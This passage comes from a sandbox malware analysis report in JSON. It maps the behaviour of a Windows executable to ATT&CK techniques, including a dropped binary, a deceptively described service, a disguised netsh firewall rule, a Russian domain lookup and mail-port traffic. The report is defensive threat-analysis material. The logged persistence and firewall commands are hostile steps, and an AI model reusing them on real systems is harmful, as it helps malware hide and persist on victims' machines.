"origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\vrzjqkmq\\\" - (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\dqczsfku.exe\" %WINDIR%\\system32\\vrzjqkmq\\\" - (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create vrzjqkmq binPath= \"%WINDIR%\\system32\\vrzjqkmq\\dqczsfku.exe /d\\\"C:\\89556f10251b58f31a9e3cbf5b\" - (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description vrzjqkmq \"wifi internet conection\"\" - (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start vrzjqkmq\" - (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00004680)\n \"dqczsfku.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00005212)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76800000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76800000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76800000\n \"dqczsfku.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76800000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76800000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76800000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\dqczsfku.exe\" %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00003672)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dqczsfku.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has an executable section named \".text\"\n \"dqczsfku.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has an writable section named \".data\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has an writable section named \".text\"\n \"dqczsfku.exe\" has an writable section named \".data\"\n \"dqczsfku.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xb1a000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xbfb000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"dqczsfku.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dqczsfku.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dqczsfku.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00004940)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\dqczsfku.exe\" %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00003672)\n Spawned process \"sc.exe\" with commandline \"create vrzjqkmq binPath= \"%WINDIR%\\\\system32\\\\vrzjqkmq\\\\dqczsfku ...\" (UID: 00000000-00003344), Spawned process \"sc.exe\" with commandline \"description vrzjqkmq \"wifi internet conection\"\" (UID: 00000000-00005028), Spawned process \"sc.exe\" with commandline \"start vrzjqkmq\" (UID: 00000000-00005144), Spawned process \"dqczsfku.exe\" with commandline \"/d\"C:\\\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00 ...\" (UID: 00000000-00005212)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005184), Spawned process \"svchost.exe\" (UID: 00000000-00002988)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00004940) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00004940) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"dqczsfku.exe\" (UID: 00000000-00005212) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"dqczsfku.exe\" (UID: 00000000-00005212) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00005184) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00005184) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002988) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002988) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00004940)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\dqczsfku.exe\" %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00003672)\n Spawned process \"sc.exe\" with commandline \"create vrzjqkmq binPath= \"%WINDIR%\\\\system32\\\\vrzjqkmq\\\\dqczsfku ...\" (UID: 00000000-00003344), Spawned process \"sc.exe\" with commandline \"description vrzjqkmq \"wifi internet conection\"\" (UID: 00000000-00005028), Spawned process \"sc.exe\" with commandline \"start vrzjqkmq\" (UID: 00000000-00005144), Spawned process \"dqczsfku.exe\" with commandline \"/d\"C:\\\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00 ...\" (UID: 00000000-00005212)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005184), Spawned process \"svchost.exe\" (UID: 00000000-00002988)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"dqczsfku.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dqczsfku.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dqczsfku.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74B10000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 746D0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dqczsfku.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"dqczsfku.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"dqczsfku.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\dqczsfku.exe]- [targetUID: 00000000-00004680]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" was detected as \"VC8 -> Microsoft Corporation\"\n \"dqczsfku.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": 